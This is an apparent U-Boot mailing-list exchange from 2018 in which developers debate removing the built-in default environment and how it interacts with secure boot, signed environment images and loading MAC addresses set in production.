On Wed, Nov 21, 2018 at 12:45 PM Wolfgang Denk wd@denx.de wrote:
Dear Stefano,
In message 9efc8990-118c-d5b9-802d-8190db2326d3@denx.de you wrote:
True, but this has side effect and limitation. You cannot change a variable in the deafult environment if you need it because you do not know it. If some changes are needed, even if for very small things like activating a gpio before ooting, you need to update the bootloader.
Just my words. (Mis) using the default environment for such purposes is broken by design.
Let's get rid of this!
Moving to shared library should be done in U-Boot project, then. Some changes are then required, at least how the environment is locked (it is not clean as it is done now - locking should be done by the library and not by the caller).
Speaking of security... shared libraries open a number of new attack vectors, too...
In a secure boot environment, you cannot allow to load the environment from an untrusted source. We need a default environment in this case.
Or you make that changes are trusted.
Right, when we sign (and check the signatures) of all other images, then why not do the very same for some environment image?
You normally cannot sign the environment in the target when saving it when using private/public keys.
We are using a signed U-Boot image that apart from the default environment only needs to load MAC addresses. I cannot do this via a loaded environment (signed or unsigned) as the MAC addresses are stored in production and I cannot rely on production always having an up-to-date environment to embed their MAC addresses when programming. To use environment loading here, I would have to implement a whitelist that only loads the MAC addresses from the saved environment. That sounds a bit hacked, too.
So when it comes to secure boot, I do think there's a use case for not loading an environment. I don't currently mind how this environment is initialized. And maybe I don't yet get what you are talking about when trying to get rid of the default environment. I do need U-Boot to run with a predefined environment without loading it.
Regards, Simon
That would even be _better_ as currently there is no, absolutely no check if the builtin default environment is in any way consistent.